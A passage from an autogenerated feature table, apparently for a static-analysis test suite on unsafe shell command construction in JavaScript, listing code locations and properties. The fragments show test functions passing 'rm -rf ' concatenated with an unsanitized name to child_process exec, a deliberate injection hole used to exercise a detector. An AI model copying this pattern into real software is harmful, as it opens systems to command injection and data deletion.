autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:11:131:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:11:131:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:11:131:19 | "rm -rf " | enclosingFunctionName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:11:131:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:11:131:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:11:131:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:11:131:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:11:131:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:11:131:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:11:131:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:11:131:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:11:131:26 | "rm -rf " + name | enclosingFunctionName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:11:131:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:11:131:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:23:131:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:23:131:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:23:131:26 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:23:131:26 | name | enclosingFunctionName | wha | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:23:131:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:131:23:131:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:2:136:2 | static ... rted\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:2:136:2 | static ... rted\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:2:136:2 | static ... rted\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:2:136:2 | static ... rted\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:2:136:2 | static ... rted\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:2:136:2 | static ... rted\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:9:134:11 | bla | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:9:134:11 | bla | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:9:134:11 | bla | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:134:11 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:134:11 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:134:11 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:134:11 | cp | enclosingFunctionName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:134:11 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:134:11 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:134:11 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:134:11 | this | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:134:11 | this | enclosingFunctionName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:134:11 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | 'arguments' object of method bla of class Cla4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | 'arguments' object of method bla of class Cla4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | 'arguments' object of method bla of class Cla4 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | 'arguments' object of method bla of class Cla4 | enclosingFunctionName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | 'arguments' object of method bla of class Cla4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | (name) ... rted\\n\\t} | assignedToPropName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | (name) ... rted\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | (name) ... rted\\n\\t} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | (name) ... rted\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | exceptional return of method bla of class Cla4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | exceptional return of method bla of class Cla4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | exceptional return of method bla of class Cla4 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | exceptional return of method bla of class Cla4 | enclosingFunctionName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | exceptional return of method bla of class Cla4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | return of method bla of class Cla4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | return of method bla of class Cla4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | return of method bla of class Cla4 | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | return of method bla of class Cla4 | enclosingFunctionName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:12:136:2 | return of method bla of class Cla4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:13:134:16 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:13:134:16 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:13:134:16 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:13:134:16 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:13:134:16 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:13:134:16 | name | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:13:134:16 | name | enclosingFunctionName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:13:134:16 | name | enclosingFunctionName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:13:134:16 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:134:13:134:16 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:4 | cp | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:4 | cp | enclosingFunctionName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:9 | cp.exec | enclosingFunctionName | bla | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:135:3:135:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 